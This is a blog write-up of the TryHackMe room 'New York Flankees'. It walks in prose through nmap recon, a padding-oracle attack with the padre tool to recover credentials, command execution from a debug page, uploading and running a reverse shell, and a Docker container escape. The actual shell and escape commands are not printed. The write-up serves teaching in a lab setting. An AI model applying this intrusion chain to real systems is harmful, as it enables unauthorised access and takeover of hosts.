Open in app

Sign in

Write

Sign in

New York Flankees (Tryhack me) writeup

GrimTheRipper
5 min readSep 3, 2024

--

By NF

  • Difficulty : Medium
  • Platform : Linux

Objectives :

Flag 1 : What is the cleartext value of the decrypted blob (the format is element1:element2)?

Flag 2 : What is the flag in the admin panel?

Flag 3 : Dig around in the container. What is the second flag?

Flag 4 : What is the final flag?

Reconnaissance (recon) is the first phase in the penetration testing or hacking process.

Use Nmap : nmap -sV -Pn {target-IP}

Let’s open on the web browser on port 8080 : http:// {target-IP}:8080/.

On this website, there is additional section that leads to some pages :

  • /login.html
  • /index.html
  • /debug.html

I went to the “Stefan Test” page and noticed something unusual.

Try opening the Inspector page; I find abnormal JavaScript code.

Try using the URL found, appending it with our machine’s IP address and the URL token.

Try to Edit the characters. The message appears as “Decryption error”.

Try searching for verbose error (padding) to see if there’s anything useful, and I found one shown in HackTricks: Padre, a tool used for exploitation

padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption

https://github.com/glebarez/padre?source=post_page-----9d3dbf6a7e11--------------------------------

After installation, you can check the commands using the command ./padre -h.

After running the command, I found the username and password as well as the answer to the first question.

Try to login.

After logging in, you will see a “Debug” button appear in the top-right corner.

On the debug page, we found our first flag.

This page allows us to use commands on the machine. Try using a command for testing.

Use curl to test the connection to the server.

Great,we received a 200 response.

It’s time to try a reverse shell exploit.

Use a reverse shell generator to create a shell.sh.

Open a listener to receive network connections.

First, put the shell to the server.

We received a request on our HTTP server, which means our shell has been successfully uploaded to the server.

Give executable permissions to the shell.

use “bash” to execute it.

We have received the shell.

The first thing we do after getting the shell is spawn a TTY.

While we explored, we found that we are in a Docker environment.

Use cd move to the app directory in the Docker environment. In the docker-compose.yml file.

We’ll find the answer to our third question and our second flag.

I did a search and found a helpful HackTricks page for breaking out of a Docker environment.

Use this command to break out of the Docker shell.

Finally, Now we have become one with the host.

Wowww, we found the the final flag.

Thank you sincerely for taking the time to read and show interest in my write-up. I am very pleased that the effort and thought put into this work have garnered your attention. Your feedback and comments are important to me and help me improve both myself and the work I do. Thank you again for your support and interest.

--

--

GrimTheRipper
GrimTheRipper

Written by GrimTheRipper

23 Followers
7 Following

You get the best out of others when you give the best of yourself

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams